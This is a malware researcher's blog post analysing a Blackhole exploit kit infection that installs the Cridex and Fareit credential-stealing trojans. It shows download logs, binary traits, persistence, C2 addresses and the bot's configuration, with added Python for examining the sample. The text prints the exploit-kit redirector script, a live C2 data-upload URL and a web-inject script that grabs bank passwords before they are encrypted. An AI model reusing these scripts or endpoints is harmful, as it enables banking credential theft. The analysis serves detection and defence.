Friday, January 18, 2013

Cridex + Fareit Infection Analysis - "dozakialko.ru:8080" A Credential Stealer Case

[NEW] Fri Jan 18 13:44:56 JST 2013: the new infector domain dfudont.ru:8080 was detected & analyzed -->>[HERE]. PS: dfudont.ru:8080 was also serving the same payload (at this moment).

The Background

Yesterday we found a spam infection which led us to URLs like these:
h00p://www.piastraollare.com/upload.htm 
h00p://kompot.designcon.tmweb.ru/upload.htm 
We went down to analyze it but had no chance to blog it, and only put scratch notes on Twitter. Today I read the infection report via spam posted by Conrad of the Dynamoo Blog -->>[Dynamoo], and my heart was called to write down the payload analysis details plus what the malware actually does, as seen yesterday. People should know exactly what the threat really is. I took the second URL to check:
--23:07:05--  h00p://kompot.designcon.tmweb.ru/upload.htm
           => `upload.htm'
Resolving kompot.designcon.tmweb.ru... 176.57.216.3
Connecting to kompot.designcon.tmweb.ru|176.57.216.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 423 [text/html]
23:07:06 (14.16 MB/s) - `upload.htm' saved [423/423]
That page contains a JavaScript redirector to the Blackhole exploit kit landing page. Note the trivial always-true condition (var1==var2) wrapped around the redirect:
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h2><b>Please wait a moment ...  You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dozakialko.ru:8080/forum/links/column.php";}
</script>
  :
Accessing that URL returns the Blackhole landing page: obfuscated JavaScript carrying PluginDetect 0.7.9, which fingerprints the installed browser plugins (Java, Adobe Reader, Flash) before an exploit is chosen. The screenshot of the obfuscated code is not reproduced here; after decoding it, the de-obfuscated script is here -->>[PASTEBIN]. I followed our own guide -->>[MMD-GUIDE] to grab the exploit components and the payloads served by this infector. The infector details are identical to the previous cases (and so are the bad actors behind it), so there is no need to describe them all over again. The components are: two PDFs, two JARs, two SWF exploits and a payload. The picture of the catches I tweeted, including the infector URL and landing page, showed the payload detected by only two AV products. For your convenience, the VT detection ratio of each sample: [infector] [landing-page] [PDF1] [PDF2] [JAR1] [JAR2/0day] [SWF1] [SWF2] [payload]

The Payload

This payload is saved under many names; the one I fetched was info.exe. The name is set by the server in the Content-Disposition header of the download response, as the snipped download log shows:
Resolving dozakialko.ru... seconds 0.00, 212.112.207.15, 89.111.176.125, 91.224.135.20
Caching dozakialko.ru => 212.112.207.15 89.111.176.125 91.224.135.20
Connecting to dozakialko.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?qf=30:1n:1i:1i:33&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&y=1k&wf=x&xt=t HTTP/1.0
Referer: MalwareMustDie Knocking on your Doors..
Host: dozakialko.ru:8080
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 16:28:13 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Wed, 16 Jan 2013 16:28:14 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Content-Length: 197632
200 OK
Registered socket 1896 for persistent reuse.
Length: 197,632 (193K) [application/x-msdownload]
01:28:21 (80.99 KB/s) - `info.exe' saved [197632/197632]
The file looks like this:
Sections:
   .text 0x1000 0x1e7fc 126976
   .rdata 0x20000 0xc578 53248
   .data 0x2d000 0x3e80 12288
   .rsrc 0x31000 0x1b4 4096

Entry Point...................: 0x2b0e
Virtual Address...............: 0x40370e
Compilation timedatestamp.....: 2012-10-14 00:30:11
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x0000370E
Trace Compiler................: Borland Delphi 3.0

Hexed: 

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   B2 69 F6 96 F6 08 98 C5 F6 08 98 C5 F6 08 98 C5    .i..............
0090   8F 29 9C C5 A5 08 98 C5 C0 2E 93 C5 49 08 98 C5    .)..........I...
00A0   8D 14 94 C5 7B 08 98 C5 F6 08 99 C5 C4 08 98 C5    ....{...........
00B0   78 00 C7 C5 CB 08 98 C5 99 17 9C C5 C3 08 98 C5    x...............
00C0   52 69 63 68 F6 08 98 C5 00 00 00 00 00 00 00 00    Rich............
00D0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00    ........PE..L...
00E0   93 07 7A 50 00 00 00 00 00 00 00 00 E0 00 03 01    ..zP............
This is Trojan Cridex. It is a plain (unpacked) PE that reverses well if you want to analyze it deeper; it just needs a bit of surgery to remove the junk strings like the ones below. One caveat on the tool output above: the "Rich" signature at offset 0xC0 of the header is written by Microsoft's linker, so the "Borland Delphi 3.0" compiler guess is a false match from the signature scanner.
0x00F79B   bbbb:
0x00F8A7   bbbb:
0x00F8DF   bbbb:
0x00F916   bbbb:
0x00F94A   bbbb:
0x00F983   bbbb:
0x00F9BD   bbbb:
0x00F9ED   bbbb:
  :        :
0x010193   bbbbbbbbbbbbbbBbb
0x0101AE   GbbbrcbbRbbbrcbbbbbbbbbbbbb"bb"L
0x0101D6   Obbb"cbbrbbb"cbbbbbbbbbbbbb"bb
0x0101FB   bbtpbbb
0x010203   cbbBbbb2cbbbbbbbbbbbbb"bb 
0x01023A   bb"b3
0x01024E   bbbb:
The payload copies itself into the user's Application Data folder with this API call:
CopyFileW(lpExistingFileName: "%path%\sample.exe", 
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe"
, bFailIfExists: 0x0)
and then launches the copy through cmd.exe using the format string "%s" /c "%s", which expands to:
%System%CMD.EXE /c %AppData%/KB00085031.exe
As captured, the original payload file is then deleted by a batch script built from the template below (the "%S" placeholders are filled with the original path; the delete is retried while the file still exists, and the :R label that the goto refers to is not part of the captured fragment):
@echo off
del /F /Q /A "%S"
if exist "%S" goto R
del /F /Q /A "%S"
During that process the following registry changes occur; the first one is the Run key entry that makes the copy persistent across logons:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00085031.exe
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 0D 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 36 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
Next, the following files were dropped into the %Temp% folder (sizes in bytes):
Path:                                                            Size:
C:\Documents and Settings\User\Local Settings\Temp\exp1.tmp      0
C:\Documents and Settings\User\Local Settings\Temp\exp2.tmp      0
C:\Documents and Settings\User\Local Settings\Temp\exp3.tmp      0
C:\Documents and Settings\User\Local Settings\Temp\exp4.tmp.exe  98,304
Then network activity started towards the following addresses, all on port 8080:
h00p://84.22.100.108:8080
h00p://182.237.17.180:8080
h00p://221.143.48.6:8080
h00p://180.235.150.72:8080
h00p://64.76.19.236:8080
h00p://163.23.107.65:8080
h00p://59.90.221.6:8080
h00p://210.56.23.100:8080
h00p://173.201.177.77:8080
h00p://203.217.147.52:8080
h00p://74.207.237.170:8080
h00p://97.74.113.229:8080
h00p://193.68.82.68:8080
h00p://69.64.89.82:8080
h00p://77.58.193.43:8080
h00p://174.120.86.115:8080
h00p://94.20.30.91:8080
h00p://174.142.68.239:8080
h00p://87.229.26.138:8080
h00p://188.120.226.30:8080
h00p://78.28.120.32:8080
h00p://217.65.100.41:8080
h00p://81.93.250.157:8080
h00p://95.142.167.193:8080
h00p://109.230.229.250:8080
h00p://109.230.229.70:8080
One of the captured communications is shown in the screenshot (not reproduced here). Note the use of the fake user-agent below:
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
The keywords marked in that capture match the strings recovered from the reversed binary:
// HTTP/1.0 and HTTP/1.1 request/response handling strings:
GET
POST
HTTP/1.0
HTTP/1.1
multipart/form-data
boundary=
Content-Disposition
name="
filename="
Content-Type
text/
Host
Referer
User-Agent
Authorization
Accept-Encoding
Content-Length
If-Modified-Since
If-None-Match
https
Transfer-Encoding
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
The best part: the data sent in the network traffic above is built from the report templates below before being encrypted. They are printf-style format strings expanded in two passes: the doubled percent signs survive the first pass, so "%%%uu" becomes e.g. "%10u" and "%%.%us" becomes "%.10s" once the field width or precision has been inserted, and the second pass fills in the actual values.
// The sent time, URL and user-agent via HTTP

<http time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<useragent><![CDATA[%%.%us]]></useragent>
<data><![CDATA[]]></data>
</http>

// Current time sent with url and data

<httpshot time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<data><![CDATA[]]></data>
</httpshot>

// FTP data...

<ftp time="%%%uu">
<server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user>
<pass><![CDATA[]]></pass>
</ftp>

// Mail POP3 data..

<pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user><pass><![CDATA[]]></pass>
</pop3>

// Command lines...
<cmd id="%u">%u</cmd>

// Certification information...
<cert time="%u">
<pass><![CDATA[]]></pass>
<data><![CDATA[]]></data>
</cert>

// Internet explorer information
<ie time="%u">
<data><![CDATA[]]></data>
</ie>

// Case of firefox....
<ff time="%u">
<data>
<![CDATA[]]>
</data>
</ff>

// Case of "mm" = Macromedia?
<mm time="%u">
<data><![CDATA[]]></data>
</mm>

// Report envelope: bot identity (unique id, version, system, network) plus the data.
// The <data> element here carries a base64, DER-encoded RSA public key (1024-bit);
// what exactly the bot encrypts with it was not confirmed in this analysis.
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u">
<header>
<unique>%%.%us</unique>
<version>%%u</version>
<system>%%u</system>
<network>%%u</network>
</header>
<data>
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
</data>
</message>
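The <data> element of that envelope is worth a closer look. The base64 string begins with MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ, the standard header of a DER-encoded SubjectPublicKeyInfo for a 1024-bit RSA key. The Python below is an added example, not code from this post or from the malware: it decodes the blob copied from the template above with a minimal DER reader and recovers the modulus and exponent, standard library only. What the bot uses the key for (encrypting the reports is the obvious guess) is not confirmed by the analysis.

```python
# Added example (not from the original post or the malware): decode the base64
# blob embedded in the Cridex <message> report template above and parse it as a
# DER-encoded SubjectPublicKeyInfo holding an RSA public key. Standard library only.
import base64

# Copied verbatim from the <data> element of the report template above.
EMBEDDED_KEY_B64 = (
    "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8ze"
    "zmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv"
    "6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB"
)

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")   # 1.2.840.113549.1.1.1

SEQUENCE, INTEGER, BIT_STRING, OBJECT_ID = 0x30, 0x02, 0x03, 0x06


def read_tlv(buf, off):
    """Read one DER element at buf[off:]; return (tag, value, offset after it)."""
    tag = buf[off]
    length = buf[off + 1]
    off += 2
    if length & 0x80:                        # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    return tag, buf[off:off + length], off + length


def parse_rsa_spki(der):
    """Return (modulus, exponent) from a DER SubjectPublicKeyInfo, or raise ValueError."""
    tag, spki, _ = read_tlv(der, 0)
    if tag != SEQUENCE:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    tag, alg, off = read_tlv(spki, 0)        # AlgorithmIdentifier
    if tag != SEQUENCE:
        raise ValueError("AlgorithmIdentifier must be a SEQUENCE")
    tag, oid, _ = read_tlv(alg, 0)
    if tag != OBJECT_ID or oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bits, _ = read_tlv(spki, off)       # subjectPublicKey BIT STRING
    if tag != BIT_STRING or bits[0] != 0:    # first byte = number of unused bits, must be 0
        raise ValueError("unexpected subjectPublicKey encoding")
    tag, rsa, _ = read_tlv(bits[1:], 0)      # RSAPublicKey ::= SEQUENCE { n INTEGER, e INTEGER }
    if tag != SEQUENCE:
        raise ValueError("RSAPublicKey must be a SEQUENCE")
    tag_n, n_bytes, off = read_tlv(rsa, 0)
    tag_e, e_bytes, _ = read_tlv(rsa, off)
    if tag_n != INTEGER or tag_e != INTEGER:
        raise ValueError("modulus and exponent must be INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def describe_key(b64=EMBEDDED_KEY_B64):
    """Summarise the embedded key: algorithm, size, exponent and the first modulus bytes."""
    n, e = parse_rsa_spki(base64.b64decode(b64))
    return {
        "algorithm": "rsaEncryption",
        "modulus_bits": n.bit_length(),
        "exponent": e,
        "modulus_prefix": format(n, "x")[:16],
    }


if __name__ == "__main__":
    for key, value in describe_key().items():
        print(f"{key}: {value}")
```

A key that is hard-coded in the sample like this is a useful indicator in its own right: its modulus can be matched across samples of the same botnet even when the C2 list changes.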
The data is taken from the following detected software and locations:
Mozilla\Firefox\Profiles
cookies.*
Macromedia
chrome.exe
firefox.exe
explorer.exe
Furthermore, botnet command keywords were also found, reminiscent of Zbot:
settings
commands
hash
httpshots
formgrabber
redirects
bconnect
httpinjects
modify
pattern
replacement
conditions
actions
redirect
process
  :(etc)
Some crypto traces (CryptoAPI imports for importing the public key above, and certificate store enumeration/export, i.e. PFXExportCertStoreEx to steal the user's certificates with their private keys):
CryptImportPublicKeyInfo
CryptDecodeObjectEx
CryptStringToBinaryA
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertCloseStore
PFXExportCertStoreEx
CertOpenSystemStoreW
PFXImportCertStore
All of the above came from the memory of the running KB00085031.exe (Cridex) process.

Where is "that" Trojan Fareit? What's that?

Moving on: among the files dropped in %Temp% there is a second piece of malware, the Fareit trojan.
2013/01/17  02:38  98,304 exp4.tmp.exe 
MD5: 6cccfd22d1694ce0a4a65c89604d998e
Just before the Cridex process stopped, Fareit was executed (screenshot not reproduced here). This is the real deal, what the bad guys really want to plant on our PC: a genuine credential stealer, backdoor and phishing client. The binary looks like this:
Sections:
   .text 0x1000 0x10ae4 69632
   .data 0x12000 0x1006c0 4096
   .rsrc 0x113000 0x4334 20480

Compilation timedatestamp.....: 2003-09-22 02:08:51
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001296
Virtual Address...............: 0x401296
Hex:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   3B 3A 67 1A 7F 5B 09 49 7F 5B 09 49 7F 5B 09 49    ;:g..[.I.[.I.[.I
0090   76 23 8D 49 61 5B 09 49 76 23 9C 49 6F 5B 09 49    v#.Ia[.Iv#.Io[.I
00A0   76 23 9A 49 7C 5B 09 49 7F 5B 08 49 29 5B 09 49    v#.I|[.I.[.I)[.I
00B0   76 23 8A 49 1F 5B 09 49 76 23 9B 49 7E 5B 09 49    v#.I.[.Iv#.I~[.I
00C0   76 23 9D 49 7E 5B 09 49 76 23 98 49 7E 5B 09 49    v#.I~[.Iv#.I~[.I
00D0   52 69 63 68 7F 5B 09 49 50 45 00 00 4C 01 03 00    Rich.[.IPE..L...
00E0   B3 59 6E 3F 00 00 00 00 00 00 00 00 E0 00 03 01    .Yn?............
00F0   0B 01 08 00 00 10 01 00 00 10 01 00 00 00 00 00    ................
0100   96 12 00 00 00 10 00 00 00 20 01 00 00 00 40 00    ......... ....@.
It seriously tries to disguise itself; the resource strings are lifted from a Dial-Up Networking dialog:
0x01642A   MS Shell Dlg
0x016492   &Restart
0x0164BE   &Do Not Restart
0x0164E2    Dial-Up Networking Command Line
0x0165DE   %2%3%4%5%6
0x0168EA   'entry' alone selects the entry in the phonebook dialog
0x01695C   Dial-Up Networking
0x016B2C   HDial-Up Networking provides Windows NT's PPP and SLIP protocol support.
0x016BBE   XDial-Up Networking is currently uninstalled.  Press 'Install' to install and configure.
0x016D02   WYou must shut down and restart your computer before the new settings will take effect.
0x016DB2   *Do you want to restart your computer now?
0x016E08   IYou must be logged on as an Administrator to install Dial-Up Networking.
and the version info impersonates a Microsoft tool (note that it claims a Vista-era build, 6.0.6001.18000, while the compile timestamp above says 2003, so the two cannot both be genuine):
0x01701A   CompanyName
0x017034   Microsoft Corporation
0x017066   FileDescription
0x017088   Security Configuration Wizard Viewer
0x0170DA   FileVersion
0x0170F4   6.0.6001.18000 (longhorn_rtm.080118-1840)
0x01714E   InternalName
0x017168   SCWViewer
0x017182   LegalCopyright
0x0171A2    Microsoft Corporation. All rights reserved.
0x017202   OriginalFilename
0x017224   SCWViewer.exe
0x017246   ProductName
0x017286    Operating System
0x0172B2   ProductVersion
0x0172D0   6.0.6001.18000
Some parts (long runs of padding) that need to be cut before reversing:
0x008E3C   0000000000000000000000000000000000000000
0x009375   "000000000000000000000000000000000000000000000000000000000000000000000000000&
0x0096EF   00000000000000000000000000000000000000000000000000000000000000
0x009D92   ]00000000000000000000000000000000000
0x00A92B   <0000000000000000F
0x00B1AE   0000000000000000000000000000000000000000000000000000
0x00B573   L00000000000000000000000000000000000000000000000000000000000000000
0x00B5DA   000000000000000000000000000000000000000000000000000000000000000000000000000000
0x00BE0F   00000000000000000Q
0x00C179   000000000000000000000000000000000000000000000000000000000000000000000A
You'll find the VT report here --->>[VIRUS-TOTAL]. The first thing this trojan does is download its config file from the CnC and save it into the registry. PoC: the screenshots (not reproduced here) show the large HTTP download from the remote host, the binary data, and the same data stored as a hex binary value in the registry; viewed as ASCII it is the tagged, HTML-like config excerpted in the next section, which is loaded whenever the trojan is activated in memory. Note that its tag names (settings, httpshots, formgrabber, httpinjects, bconnect, redirects) are exactly the command keywords recovered above from the memory of KB00085031.exe, so this config is consistent with the Cridex component of the infection rather than the Fareit binary; Fareit's own credential theft and upload are covered in the sections after it. In the following section I will try to explain what's inside this config file.

What was stolen?

That config file explains many things. Below is what it targets, i.e. what gets stolen (the captions in quotes are mine; in the excerpts, domains are defanged with ・ in place of a dot, the same way h00p stands for http):
"cash & wires accounts"


 <settings hash="e0014db74a7606d107a0b61e31f0d159334877e8">
 <httpshots><url type="deny">\.(css|js)($|\?)</url>
 <url contentType="^text/(html|plain)">\.com/k1/</url>
 <url contentType="^text/(html|plain)">/ach/</url>
 <url contentType="^text/(html|plain)">/authentication/zbf/k/</url>
 <url contentType="^text/(html|plain)">/bb/logon/</url>
 <url contentType="^text/(html|plain)">chase\.com</url>
 <url contentType="^text/(html|plain)">/cashman/</url>
 <url contentType="^text/(html|plain)">/cashplus/</url>
   :        :                :          :
 <url contentType="^text/(html|plain)">achredirect\.aspx</url>
 <url contentType="^text/(html|plain)">cbonline</url>
 <url contentType="^text/(html|plain)">/ebc_ebc1961/</url>
 <url contentType="^text/(html|plain)">/ibs\.</url>
 <url contentType="^text/(html|plain)">/ibws/</url>
 <url contentType="^text/(html|plain)">/icm/</url>
 <url contentType="^text/(html|plain)">/icm2/</url>
 <url contentType="^text/(html|plain)">/inets/</url>
 <url contentType="^text/(html|plain)">/livewire/</url>
 <url contentType="^text/(html|plain)">/loginolb/loginolb</url>
 <url contentType="^text/(html|plain)">/netbnx/</url>
 <url contentType="^text/(html|plain)">/olbb/</url>
 <url contentType="^text/(html|plain)">/phcp</url>
 <url contentType="^text/(html|plain)">/sbuser/</url>
 <url contentType="^text/(html|plain)">/smallbiz/</url>
 <url contentType="^text/(html|plain)">/wcmpw/</url>
 <url contentType="^text/(html|plain)">/webcm/</url>
 <url contentType="^text/(html|plain)">/wire/</url>
 <url contentType="^text/(html|plain)">/wires/</url>

"online bankings..."

 <url contentType="^text/(html|plain)">2checkout\・com</url>
 <url contentType="^text/(html|plain)">ablv\・com</url>
 <url contentType="^text/(html|plain)">access\・jpmorgan\.com</url>
 <url contentType="^text/(html|plain)">access\.usbank\・com</url>
 <url contentType="^text/(html|plain)">accessbankplc\・com</url>
 <url contentType="^text/(html|plain)">accountoverview\.aspx</url>
 <url contentType="^text/(html|plain)">accurint\.com</url>
 <url contentType="^text/(html|plain)">achieveaccess\・citizensbank\.com</url>
 <url contentType="^text/(html|plain)">achpayment</url>
 <url contentType="^text/(html|plain)">achweb\.unionbank\.com</url>
 <url contentType="^text/(html|plain)">achworks\・com</url>
 <url contentType="^text/(html|plain)">alltimetreasury\.pacificcapitalbank\.com</url>
 <url contentType="^text/(html|plain)">alphabank\・com</url>
 <url contentType="^text/(html|plain)">amegybank\・com/</url>
 <url contentType="^text/(html|plain)">anb\.portalvault\・com</url>
 <url contentType="^text/(html|plain)">atbonlinebusiness\・com</url>
   :     :                    :                :
 <url contentType="^text/(html|plain)">westfield\.accounts\-in\-view\.com</url>
 <url contentType="^text/(html|plain)">wiretransfer</url>
 <url contentType="^text/(html|plain)">wtdirect\.com</url>
 </httpshots>
 
"SNS Accounts.."

 <formgrabber>
   <url type="deny">\.(swf)($|\?)</url>
   <url type="deny">/isapi/ocget.dll</url>
   <url type="allow">^https?://aol・com/.*/login/</url>
   <url type="allow">^https?://accounts.google・com/ServiceLogin</url>
   <url type="allow">^https?://login.yahoo・com/</url>
   <url type="allow">^https?://login.live・com/</url>
   <url type="deny">^https?://(\w+\.)?aol・com</url>
   <url type="deny">^https?://(\w+\.)?facebook・com/</url>
   <url type="deny">^https?://(\w+\.)?google</url>
   <url type="deny">^https?://(\w+\.)?yahoo</url>
   <url type="deny">^https?://(\w+\.)?youtube・com</url>
   <url type="deny">^https?://(\w+\.)?live.com</url>
   <url type="deny">^https?://(\w+\.)?twitter・com</url>
   <url type="deny">^https?://(\w+\.)?vk・com</url>
   <url type="allow">.*</url>
   </formgrabber>
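To see how such rule blocks get consumed, here is an added Python example (not the post's code and not the bot's): it loads the formgrabber block above plus a few of the httpshots rules into regexes and evaluates sample URLs against them. Two things are assumptions inferred only from the rule ordering (login pages allowed before their whole domains are denied, the .* catch-all last) and not confirmed by the post: the first matching rule wins, and a url element without a type attribute is an allow rule. The ・ defanging is undone in the embedded XML so the regexes are real.

```python
# Added example (not code from the post or from the bot): load the formgrabber
# rules quoted above, plus a few httpshots rules, and evaluate URLs against them.
# Assumptions (not confirmed by the post): the first matching rule wins, and a
# <url> element without a type attribute is an allow rule.
import re
import xml.etree.ElementTree as ET

FORMGRABBER_XML = r"""<formgrabber>
  <url type="deny">\.(swf)($|\?)</url>
  <url type="deny">/isapi/ocget.dll</url>
  <url type="allow">^https?://aol\.com/.*/login/</url>
  <url type="allow">^https?://accounts\.google\.com/ServiceLogin</url>
  <url type="allow">^https?://login\.yahoo\.com/</url>
  <url type="allow">^https?://login\.live\.com/</url>
  <url type="deny">^https?://(\w+\.)?aol\.com</url>
  <url type="deny">^https?://(\w+\.)?facebook\.com/</url>
  <url type="deny">^https?://(\w+\.)?google</url>
  <url type="deny">^https?://(\w+\.)?yahoo</url>
  <url type="deny">^https?://(\w+\.)?youtube\.com</url>
  <url type="deny">^https?://(\w+\.)?live\.com</url>
  <url type="deny">^https?://(\w+\.)?twitter\.com</url>
  <url type="deny">^https?://(\w+\.)?vk\.com</url>
  <url type="allow">.*</url>
</formgrabber>"""

# A handful of the httpshots (page capture) rules quoted above.
HTTPSHOTS_XML = r"""<httpshots>
  <url type="deny">\.(css|js)($|\?)</url>
  <url contentType="^text/(html|plain)">chase\.com</url>
  <url contentType="^text/(html|plain)">/wires/</url>
  <url contentType="^text/(html|plain)">wiretransfer</url>
</httpshots>"""


def load_rules(xml_text):
    """Compile each <url> element into (action, url_regex, content_type_regex_or_None)."""
    rules = []
    for el in ET.fromstring(xml_text).findall("url"):
        action = el.get("type", "allow")             # assumption: missing type == allow
        ctype = el.get("contentType")
        rules.append((action, re.compile(el.text), re.compile(ctype) if ctype else None))
    return rules


def evaluate(rules, url, content_type=None):
    """True if the bot would act on this request (grab the form / snapshot the page)."""
    for action, url_re, ctype_re in rules:
        if ctype_re is not None and not (content_type and ctype_re.search(content_type)):
            continue                                 # rule only applies to matching responses
        if url_re.search(url):
            return action == "allow"                 # assumption: first match decides
    return False


FORMGRABBER = load_rules(FORMGRABBER_XML)
HTTPSHOTS = load_rules(HTTPSHOTS_XML)

if __name__ == "__main__":
    for u in ("https://accounts.google.com/ServiceLogin?hl=en",
              "https://mail.google.com/mail/",
              "https://www.facebook.com/login.php",
              "https://www.somebank.example/olb/login.aspx"):
        print(f"formgrab {u}: {evaluate(FORMGRABBER, u)}")
    for u, ct in (("https://www.chase.com/online/summary", "text/html"),
                  ("https://www.chase.com/static/app.js", "application/javascript"),
                  ("https://www.chase.com/img/logo.png", "image/png")):
        print(f"httpshot {u}: {evaluate(HTTPSHOTS, u, ct)}")
```

Read this way, the formgrabber block says the opposite of what a first glance suggests: the big social networks are mostly denied (they would only produce noise), their login endpoints are explicitly allowed, and every other form submission on the machine, including any bank not in the httpshots list, is captured by the trailing .* rule.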
How the captured data is passed on:
"Redirecting data to POST.."
   
   <redirect><pattern>jQuatro.js</pattern>
   <process><![CDATA[http://62.76.177.123/mx/3A/in/cp.php?h=8]]></process>
   </redirect></redirects>
   
"BOTNET Connection..."
   
   <bconnect>85.143.166.72:443</bconnect>
   <httpinjects><httpinject><conditions>
How the bank page's own password encryption is sidestepped: the injected script wraps the site's EncryptPassword function and appends the cleartext value to the form as a hidden OPN field (the saved original fn is presumably called afterwards; the excerpt is cut here):
"Capturing the passwords before they are encrypted...."

   <replacement><![CDATA[
 <script type='text/javascript'>
 if(typeof window.EncryptPassword=='function')
 {
   var fn=window.EncryptPassword;
   window.EncryptPassword=function(id)
   {
     try
     { var e=document.getElementById(id);
       var i=document.createElement("input");
       i.type="hidden";
       i.name="OPN";
       i.value=e.value;
       document.Form1.appendChild(i);
The httpinject conditions give a complete list of the targeted online banking sites (the attribute values are elided as "..." in this excerpt):
 <url ...">^https://(www\.|)cashanalyzer\.com/</url>
 <url ...">^https://(www\.|)enternetbank\.com/</url>
 <url ...">^https://(www\.|)nashvillecitizensbank\.com/</url>
 <url ...">^https://.*citizensbank\.com/</url>
 <url ...">^https://.+\.firsttennessee\.com/</url>
 <url ...">^https://.*firstcitizens\.com/</url>
 <url ...">^https://(bolb\-(west|east)|www)\.associatedbank\.com/</url>
 <url ...">^https://.*secure\.fundsxpress\.com/</url>
 <url ...">^https://usgateway\d*\.rbs\.com/</url>
 <url ...">^https://(www\.|)svbconnect\.com/</url>
 <url ...">^https?://(www\d*\.|)(ntrs|northerntrust)\.com/</url>
 <url ...">^https://cib\.bankofthewest\.com/</url>
 <url ...">^https://.+\.unionbank\.com/</url>
 <url ...">^https://webbankingforbusiness\.mandtbank\.com/</url>
 <url ...">^https://ifxmanager\.bnymellon\.com/</url>
 <url ...">^https://(ecash\.|.+/cashman/)</url>
 <url ...">^https://banking\.calbanktrust\.com/</url>
 <url ...">^https://.+/(wcmfd/wcmpw|phcp/servlet)/</url>
 <url ...">^https://(www\.|)efirstbank\.com/</url>
 <url ...">^https://singlepoint\.usbank\.com/</url>
 <url ...">^https://business-eb\.ibanking-services\.com/</url>
 <url ...">^https://www8\.comerica\.com/</url>
 <url ...">^https://.+\.53\.com/</url>
 <url ...">^https://businessonline\.tdbank\.com/</url>
 <url ...">^https://treas-mgt\.frostbank\.com/</url>
 <url ...">^https://.+\.huntington\.com/</url>
